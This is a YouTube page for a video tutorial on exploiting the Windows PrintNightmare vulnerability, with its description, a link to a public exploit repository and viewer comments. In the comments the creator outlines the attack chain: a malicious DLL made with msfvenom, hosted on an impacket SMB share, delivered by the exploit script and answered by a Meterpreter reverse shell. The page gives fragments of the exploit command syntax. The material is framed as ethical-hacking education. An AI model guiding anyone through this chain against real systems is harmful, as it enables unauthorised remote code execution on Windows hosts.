Explaining and Exploiting PrintNightmare | CVE-2021-34527
Вставка
- Опубліковано 7 сер 2021
- Hello everyone,
Hope you are doing great!
In this video, I walk you through explaining and exploiting Print Nightmare, Print Nightmare is a very serious vulnerability which leads to RCE (Remote code execution) and LPE (Local Privilege Escalation). I hope you enjoy the video! Make sure to leave a like and subscribe to the channel ;)
Note : This video is just for educational purposes, Nor me, neither my channel will be responsible for any malicious intent of yours.
PrintNightmare Repo : github.com/cube0x0/CVE-2021-1675
My Socials:
Twitter : / bhalgamavedant
GitHub : github.com/Vedant-Bhalgama
Note:
All videos and tutorials are for informational and educational purposes only. I believe that ethical hacking, information security, and cybersecurity should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on this channel are only for those interested in learning about Ethical Hacking, Security, and Penetration Testing. Hacking tutorials are against the misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. - Наука та технологія
Vulnerbility that Rocked the World "PrintNightMare" .... You Did It great !!!
Nice buddy. You did great ! 🤟
i still don't understand this. does printnightmare only happens to shared printers (e. g. USB) but not to printers on a switch? since printnightmare, all the patches we had installed didn't allow us to access our shared printer (connected to main pc with USB). the main pc is connected to a big LAN. now we bought a nice 8-port switch and connected lots of devices to it and the best part now: every pc can access the printer now perfectly.
in the beginning, using the shared printer was only possible by downloading the driver from the main pc. since the printer is connected to the switch, the driver has to be downloaded from the hp-website.
GREAT!!!!
Nice effort.. dude. Keep going!
Thank you!
Great
This is the best video ever
I have tried the same but at the last stage what name, password and IP should be used? Because of this, I am stuck here and unable to proceed further
Do you know how to use SMBv2 instead of v3 when setting up the server with impacket? Thanks!
Please add the -smb2support flag
Just a quick query....this exploit can be used to target normal workstations as well and not necessarily domain controllers...Its just that the machine needs to be part of the domain...Am i right?
Yes, You are right, This is an AD based attack, The machine should be a part of the domain
@@ActiveXSploit thanks man ..n great job... One request ...at the end of video...if you could quickly add a slide about the steps n a one liner explanation about the command significance it would be super awesome
@@ian230187 Glad you liked it! Alright! Im gonna keep that in mind!
Hello there its a great video and explains everything in great detail. I'm quite new to using metasploit or not really I just can't wrap my head around it. So when I connect to the windows machine how do I actually navigate it, can I just use normal windows commands? So if I would for example want to just make a new file I would just type into the msfconsole "md %random%" for example if I wanted to make a random empty file
You can switch to the shell mode by typing the command 'shell' when you get a meterpreter connection, and you can just run standard windows commands such as cd, mkdir, rmdir, and so on, But you can also do this in a meterpreter session, just type out help to list out available commands in a meterpreter session
@@ActiveXSploit alright thank you very much! You've been so helpful and make great videos
@@theikeamafia1347 Glad to hear that! There are good videos on usage of metasploit on UA-cam, just search them up and you should get some good resources!
@@ActiveXSploit yes thank you I'll go see. I've checked out some videos before but all I've really found is basics and how to create a reverse tcp shell. Otherwise it doesn't really go in depth about metasploit. Found one which is very good tho
@@ActiveXSploit i just can't seem to get it to work so at the end to establish the connection you do python3 ./CVE-2021-1675.py then what is it I put here/username:"password"@ip adress of target machine '\\my ip adress\share\shell.dll'
Did I get all that correct? Except for my question on what to put before the username
Hey there...
Was revising this..
Hi there...
Unable to figure out the need for this share drive that we set on the kali...
We used msfvenom to create the payload..
Metasploit for listening the connection...
Now our aim is to execute this payload on the remote workstation that has print spooler service is enabled...
Why did we need the help of a share drive in our attacker workstation and use impacket to use the victim to execute that dll file via the share hosted on our machine ...if we had somehow managed to deliver that payload to the victim, i guess the share drive n impacket step is not needed...
Please enlighten me
We need the SMB Share, So what we do is, Generate a malicious DLL using msfvenom, And then use the custom version of impacket used in the video, We need the SMBServer.py as it is going to host our malicious DLL, The exploit will get the Malicious DLL on the system by the SMB Share which we hosted, Once it is on the system, The DLL will be injected into the memory, And all of this is happening due to the vulnerability, PrintSpooler had an authentication bug in it, Due to which any one could install print drivers, As an attacker, We can take advantage of it and put a malicious DLL on the target system.
@@ActiveXSploit thanks man..
So i understand this...
- msfvenom: payload creation
- impacket smbshare: create a share drive on local machine to host the malicious dll.
- impacket cve module: to force the Victim to execute the DLL which becomes possible due to auth bypass bug.
- metasploit: get a reverse shell once the dll is executed
@@ian230187 We are using impacket to set up a smbshare, impacket is the name of the scripts, Don't get confused by it, There is a impacket script called smbserver which we used to setup an SMB Share which is going to server our malicious DLL. The one which delivers the DLL over there and executes it, Is the exploit
@@ActiveXSploit ohh ya..my typo...
Impacket modules of smbshare and the cve..
Thanks
Noice
better to make a venv to have the custom impacket
Nice video. Tried that but defender is a bitch.
Haha, Defender is getting better everyday!
Give me the link window 2016 vuln sir !
Do check description of the video please.
Can you give me the link how to download window 2016 vulnerable.
@@sarunkim6096 What do you mean? Vulnerable version of Windows Server 2016?
Yes I want to test it .
@@ActiveXSploit I have download window 2016 from Microsoft but does not vulnerable.